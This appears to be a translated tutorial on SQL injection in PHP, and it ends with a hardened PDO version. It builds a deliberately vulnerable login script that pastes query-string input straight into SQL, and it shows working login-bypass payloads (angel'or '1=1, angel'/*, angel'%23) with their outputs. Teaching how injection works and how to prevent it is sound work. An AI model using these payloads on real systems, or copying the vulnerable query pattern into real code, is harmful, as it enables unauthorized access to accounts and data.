Let me first give you an example that shows the particularities and the principle of injection under PHP. This example also shows how to learn to construct effective SQL statements.
Take user verification as the example. First, create a database and a table and insert one record, as follows:
SQL code:
CREATE TABLE `user` (
  `userid` int(11) NOT NULL auto_increment,
  `username` varchar(20) NOT NULL default '',
  `password` varchar(20) NOT NULL default '',
  PRIMARY KEY (`userid`)
) ENGINE=MyISAM AUTO_INCREMENT=3;  -- ENGINE= replaces the old TYPE= keyword
#
# Export the data in the table `user`
#
INSERT INTO `user` VALUES (1, 'angel', 'mypass');
The user-verification file (user.php) is as follows:
PHP code:
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname     = "injection";

// The original relies on register_globals to fill $username and $password
// from the query string; reading $_GET explicitly gives the same behaviour
// on configurations where register_globals is off.
$username = isset($_GET['username']) ? $_GET['username'] : '';
$password = isset($_GET['password']) ? $_GET['password'] : '';

mysql_connect($servername, $dbusername, $dbpassword) or die("Database connection failed");

// Vulnerable: the raw input is spliced straight into the SQL text, so a
// single quote in the input ends the string literal and whatever follows
// is parsed as SQL syntax.
$sql = "SELECT * FROM user WHERE username='$username' AND password='$password'";
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
if (empty($userinfo)) {
    echo "Login failed";
} else {
    echo "Login successful";
}
// The executed query is echoed back so the tutorial can show where the
// input landed in the SQL.
echo "<p>SQL Query:$sql<p>";
?>
At this time we submit:
http://127.0.0.1/injection/user.php?username=angel'or 1=1
and it will return:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13
Login failed
SQL Query:SELECT * FROM user WHERE username='angel' or 1=1' AND password='
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13
See? Our single quote closes the username literal, but the original closing quote that follows is still there and is not commented out, so the quotes are no longer paired. The statement we constructed therefore cannot be executed by MySQL and has to be restructured:
http://127.0.0.1/injection/user.php?username=angel'or '1=1
At this time, "Login successful" is displayed, which shows that the injection worked. Alternatively, submit:
http://127.0.0.1/injection/user.php?username=angel'/*
http://127.0.0.1/injection/user.php?username=angel'%23
This comments out the rest of the statement. Let's look at the differences between these submissions. The first uses a logical operator; that technique is also very widely used in ASP injection, so it needs no further explanation. The second and third rely on a feature of MySQL: it supports two comment formats, /* and #, so whatever follows our input is commented out. Note that, because of how the address bar encodes the URL, a # typed into the IE address bar is dropped and nothing after it reaches the server; submit %23 instead, which the server decodes to #, and the rest of the statement is commented out successfully. This is much simpler than the logical-operator approach, and it shows that PHP is considerably more powerful and flexible than ASP in this respect.
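As an added defensive counterpart (example code, not from the original tutorial), here is the same login check written with PDO prepared statements, so that a quote, /* or # inside the username is treated as data rather than SQL syntax. The connection settings mirror the tutorial's and are assumptions for this example.

```php
<?php
// Added example, not from the original tutorial: the same login check using
// PDO prepared statements. Connection settings mirror the tutorial's and are
// assumptions for this example.
$dsn        = 'mysql:host=localhost;dbname=injection;charset=utf8mb4';
$dbusername = 'root';
$dbpassword = '';

// Hardened: the statement text is fixed before any input is seen and the
// values are bound separately, so an input such as angel'or '1=1 is compared
// literally against the username column and simply matches no row.
function login(PDO $db, $username, $password)
{
    $stmt = $db->prepare(
        'SELECT userid FROM user WHERE username = :u AND password = :p'
    );
    $stmt->execute(array(':u' => $username, ':p' => $password));
    return $stmt->fetch(PDO::FETCH_ASSOC) !== false;
}

try {
    $db = new PDO($dsn, $dbusername, $dbpassword, array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
    ));
} catch (PDOException $e) {
    exit('Database connection failed');
}

// Read input explicitly rather than relying on register_globals.
$username = isset($_GET['username']) ? $_GET['username'] : '';
$password = isset($_GET['password']) ? $_GET['password'] : '';

echo login($db, $username, $password) ? 'Login successful' : 'Login failed';
// The executed SQL is deliberately not echoed back to the client, so the
// query structure is not revealed in the response.
```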